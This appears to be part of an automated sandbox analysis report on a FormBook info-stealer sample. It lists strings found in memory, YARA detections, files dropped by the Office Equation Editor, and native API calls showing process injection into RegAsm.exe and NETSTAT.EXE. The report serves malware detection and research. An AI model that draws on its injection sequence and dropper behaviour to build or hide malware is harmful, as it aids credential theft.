          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195388777.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2194994510.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2195836515.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\choice.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\choice.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F00AD NtOpenSection,NtMapViewOfSection,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419D50 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419E00 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419E80 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419D4B NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419DFE NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419DA4 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419E7A NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419F2B NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530060 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025310D0 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02531148 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253010C NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025301D4 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025307AC NtCreateMutant,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FA50 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FA20 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FAB8 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FB50 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F8CC NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02531930 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F938 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FE24 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FF34 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FFFC NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530C40 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC48 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC30 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FD5C NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02531D80 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B9DAE NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C510D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C50048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C50060 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C50078 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C501D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C51148 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C5010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C51930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C4FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00C50C40 NtGetContextThread,
